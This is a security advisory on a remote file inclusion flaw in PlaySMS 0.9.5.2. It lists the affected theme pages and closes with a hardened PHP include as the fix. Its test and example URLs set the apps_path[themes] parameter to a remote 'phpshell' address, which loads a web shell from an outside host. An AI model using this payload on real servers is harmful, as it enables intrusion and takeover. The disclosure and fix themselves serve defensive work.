[o] PlaySMS <= Remote File Inclusion Vulnerability
Software: PlaySMS ver 0.9.5.2 Vendor: http://playsms.org/ Author: NoGe
=============================================================================================================
[o] Vulnerability analysis
<?php include $apps_path['themes']."/".$themes_module."/header.php"; ?>
The include path is built from $apps_path['themes'], which these theme pages do not initialise themselves, so a request-supplied value is used. Affects all of the following files:
web/plugin/themes/default/page_forgot.php
web/plugin/themes/default/page_login.php
web/plugin/themes/default/page_noaccess.php
web/plugin/themes/default/page_register.php
web/plugin/themes/km2/page_noaccess.php
web/plugin/themes/work2/page_forgot.php
web/plugin/themes/work2/page_login.php
web/plugin/themes/work2/page_noaccess.php
web/plugin/themes/work2/page_register.php
[o] Test
http://www.2cto.com/[path]/web/plugin/themes/default/page_forgot.php?apps_path[themes]=[RFI]
[o] Example
http://www.2cto.com/[path]/web/plugin/themes/default/page_forgot.php?apps_path[themes]=http://phpshell?
=============================================================================================================
Fix: filter the input
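A hardened form of the header include, as an added example (not PlaySMS's own code). It assumes the theme page files live under web/plugin/themes/<theme>/ as listed above, that the bootstrap defines a guard constant (here the hypothetical _SECURE_), and that allow_url_include is disabled in php.ini as defence in depth.

```php
<?php
// Refuse direct requests to a theme page: the bootstrap that should define
// $apps_path and $themes_module never ran, so any value they hold came from
// the request (register_globals-style injection). _SECURE_ is a hypothetical
// guard constant assumed to be set by the application's front controller.
if (!defined('_SECURE_')) {
    http_response_code(403);
    exit;
}

// Fixed base directory: this file sits in web/plugin/themes/<theme>/, so the
// parent directory is the themes root. Never derived from request data.
$themes_base = realpath(__DIR__ . '/..');

// Allow-list of theme names taken from the affected-file list on this page.
$allowed_themes = array('default', 'km2', 'work2');

/**
 * Resolve the header.php for a theme, or throw if it is not a local file
 * inside the themes directory.
 */
function safe_theme_header(string $themes_base, array $allowed, string $theme): string
{
    // 1. Allow-list the theme name: rejects '../', URL schemes, null bytes.
    if (!in_array($theme, $allowed, true)) {
        $theme = 'default';
    }
    // 2. Build the path from the constant base. realpath() collapses '..'
    //    and symlinks; the prefix check rejects anything outside the base.
    $path = realpath($themes_base . '/' . $theme . '/header.php');
    if ($path === false || strpos($path, $themes_base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('theme header is outside the themes directory');
    }
    return $path;
}

// $themes_module is only used as a lookup key, never as a path fragment.
$theme = isset($themes_module) ? (string) $themes_module : 'default';
include safe_theme_header($themes_base, $allowed_themes, $theme);
```

With this change an `apps_path[themes]=` query parameter no longer reaches the include, and a malformed theme name falls back to the default theme instead of a remote URL.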